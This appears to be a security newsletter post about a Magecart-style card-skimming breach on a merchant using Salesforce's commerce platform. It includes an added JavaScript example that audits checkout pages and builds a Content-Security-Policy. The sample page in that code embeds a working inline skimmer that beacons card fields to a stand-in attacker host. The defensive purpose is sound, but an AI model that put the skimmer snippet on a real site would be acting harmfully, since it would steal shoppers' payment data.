Normally when I read about another breach, I yawn. Maybe it rates a mention in the new “Breaches This Week” section of my newsletter.
But this case is a bit different.
The affected company’s online purchasing platform was hacked and the compromise went undetected for about two months. Again, not that unusual. The attack, a form of web skimming often grouped under the Magecart label, works by injecting malicious code, typically JavaScript, into the checkout pages. That malicious code skims the customer’s credit card information from the checkout form and sends it to a site controlled by the attacker, possibly in a country not so friendly to us.
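To make the mechanism concrete, here is an added example (not code from the original post, and not anything from Salesforce or the breached merchant) of the two things a site owner can do about this pattern: a static audit of a checkout page that flags script sources and beacon destinations outside an allowlist, and the Content-Security-Policy that would leave an injected skimmer with nowhere to send card data. The host names, the allowlist and the sample checkout page are all constructed for illustration; the inline skimmer in the sample is deliberately readable, whereas real ones are obfuscated.

```javascript
// Added example, not from the original post or from Salesforce. All host names
// and the sample page below are constructed for illustration.

const PAGE_HOST = 'shop.example';

// Hosts the merchant has vetted (first-party CDN and the payment processor's
// SDK). Anything else loading on, or talking out of, the checkout page is
// suspect. Constructed allowlist.
const ALLOWED_HOSTS = new Set(['shop.example', 'cdn.shop.example', 'js.psp.example']);

// Constructed checkout page: two legitimate scripts, one injected external
// script, and one injected inline skimmer that beacons the card fields to an
// attacker-controlled host on submit.
const SAMPLE_CHECKOUT_HTML = `
<html><head>
<script src="https://cdn.shop.example/checkout.js"></script>
<script src="https://js.psp.example/v3/sdk.js"></script>
<script src="https://cdn-jquery-update.example/jquery.min.js"></script>
</head><body>
<form id="pay" action="/checkout/submit">
  <input name="cc-number"><input name="cc-exp"><input name="cc-csc">
</form>
<script>
document.getElementById('pay').addEventListener('submit', function () {
  var d = {};
  document.querySelectorAll('input').forEach(function (i) { d[i.name] = i.value; });
  navigator.sendBeacon('https://stats-collector.example/c', JSON.stringify(d));
});
</script>
</body></html>`;

// Resolve a relative, protocol-relative or absolute URL to its host name.
function hostOf(rawUrl) {
  try {
    return new URL(rawUrl, `https://${PAGE_HOST}/`).hostname;
  } catch (e) {
    return null;
  }
}

// Every <script src="..."> on the page, in document order.
function externalScriptSources(html) {
  const out = [];
  const re = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["'][^>]*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Absolute URLs inside inline <script> bodies: the destinations a skimmer
// would hand to fetch(), XMLHttpRequest, sendBeacon() or an Image pixel.
function inlineScriptDestinations(html) {
  const out = [];
  const block = /<script\b(?![^>]*\bsrc\s*=)[^>]*>([\s\S]*?)<\/script>/gi;
  const url = /https?:\/\/[^\s"'`<>)]+/g;
  let m;
  while ((m = block.exec(html)) !== null) {
    let u;
    while ((u = url.exec(m[1])) !== null) out.push(u[0]);
  }
  return out;
}

// Report everything that loads from, or sends to, a host outside the allowlist.
function auditCheckoutPage(html, allowed = ALLOWED_HOSTS) {
  const flag = (urls) => urls.filter((u) => {
    const h = hostOf(u);
    return h === null || !allowed.has(h);
  });
  return {
    unexpectedScripts: flag(externalScriptSources(html)),
    unexpectedDestinations: flag(inlineScriptDestinations(html)),
  };
}

// The CSP a checkout page should ship with: scripts only from vetted hosts,
// and connect-src (which also governs sendBeacon), img-src and form-action
// pinned so that an injected script has no exfiltration channel. Deploy it as
// Content-Security-Policy-Report-Only first and read the reports.
function buildCheckoutCsp(allowed = ALLOWED_HOSTS) {
  const hosts = [...allowed]
    .filter((h) => h !== PAGE_HOST)
    .map((h) => `https://${h}`)
    .join(' ');
  return [
    "default-src 'self'",
    `script-src 'self' ${hosts}`,
    `connect-src 'self' ${hosts}`,
    "img-src 'self'",
    "form-action 'self'",
    'report-uri /csp-report',
  ].join('; ');
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(auditCheckoutPage(SAMPLE_CHECKOUT_HTML));
  console.log(buildCheckoutCsp());
}
```

Run against the sample page, the audit flags the jquery lookalike host and the stats-collector beacon while passing the two vetted scripts. Two caveats a practitioner should keep in mind: a static scan of served HTML misses scripts that are created at runtime or whose destination strings are obfuscated, so the CSP (with reporting) is the control that actually holds, and a skimmer planted on an allowlisted host, such as a compromised third-party CDN, passes both checks unless the page also pins those scripts with Subresource Integrity.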
What made me pause is that this website is hosted inside Salesforce.com’s environment on their Salesforce commerce platform.
The company was not able to determine which credit cards were compromised, so it had to notify everyone who used a credit card on the site in that two-month window. What was compromised was the buyer’s name, address and full credit card information.
This is, apparently, not the first time that the Salesforce commerce platform was compromised.
Similar to attacks on Managed Service Providers (MSPs), attackers know that if they can compromise an aggregation point like an MSP or Salesforce, they can potentially reach a lot of customers at once.
It is possible that Salesforce understands how the hackers got in and has fixed the problem. If not, companies that use Salesforce’s ecommerce platform should be on high alert.
In the meantime, how come they could not tell which cards were stolen? Was there insufficient logging to tell?
I don’t know if this company sells worldwide, but were they using geofencing to reduce the attacker’s opportunity?
Did they pen test their application? Is the vulnerability in their code rather than Salesforce’s?
We may find out more later, but in the meantime, this is yet another warning for website owners to step up their security.
Source: Bleeping Computer